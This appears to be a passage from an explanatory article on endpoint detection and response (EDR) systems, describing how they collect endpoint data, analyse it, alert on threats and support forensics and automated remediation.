Monitor and update regularly. Organizations should continuously monitor their endpoint activity and ensure their EDR software is updated with the latest threat intelligence and patches.

EDR is primarily concerned with endpoints, which can be any computer system in a network, such as end-user workstations and servers. The systems protect most operating systems, including Windows, macOS, Linux and Berkeley Software Distribution, but they don't include network monitoring.

An EDR system gathers information from many sources, including endpoints, firewalls, network scans and internet logs. Security vendors also offer EDR as part of a SIEM package, enabling a security operations center to investigate and respond to threats.

EDR is an integral part of a complete information security posture. It isn't antivirus software, but it may have antivirus capabilities or use data from another antivirus product. Antivirus software is primarily responsible for protecting against known malicious software. A well-executed EDR program, on the other hand, finds new exploits as they are running and detects malicious activity during an active incident. EDR is able to detect fileless malware attacks and attackers using stolen credentials, which traditional antivirus software can't stop.

The role of an EDR system falls broadly into two categories:

Because EDR capabilities vary from vendor to vendor, an organization researching EDR systems should carefully investigate the capabilities of any proposed system. They should also consider how well it can integrate with their current endpoint security solution and other security capabilities.

EDR systems gather and organize data from endpoints, and then use that information to identify irregularities or trends. They use many data sources from an endpoint, including logs, performance monitoring information, file details, running processes and configuration data. A dedicated agent installed on the endpoint collects this data, or the system might use built-in operating system capabilities and other helper programs.

EDR systems organize and analyze the collected data. A client device might perform portions of this, but, generally, a central system -- hardware device, a virtual server or a cloud service -- performs these functions.

Simple EDR systems often only collect and display data or aggregate it and show trends. Operators might find following and making decisions based on this type of data difficult.

Advanced EDR systems use machine learning or artificial intelligence to automatically identify and send alerts about new and emerging threats. They might also use aggregate information from the product vendor to better flag endpoint threats. Some systems allow mapping of observed suspicious behavior to the MITRE ATT&CK framework to help detect patterns.

EDR threat response capabilities help the operator take corrective action, diagnose further issues and perform forensic analysis. This can enable issue tracking and help identify malicious activity or otherwise aid an investigation. Forensic capabilities help establish timelines, identify affected systems post breach and gather artifacts or investigate live system memory in suspect endpoints. Combining historical and current situational data helps to provide a fuller picture during an incident.

Some endpoint detection and response systems perform automated remediation activities, such as disconnecting or stopping compromised processes or alerting the user or information security group. They also can actively isolate or disable suspect endpoints or accounts. A good incident response system will also help coordinate teams during an active incident, helping to reduce its impact.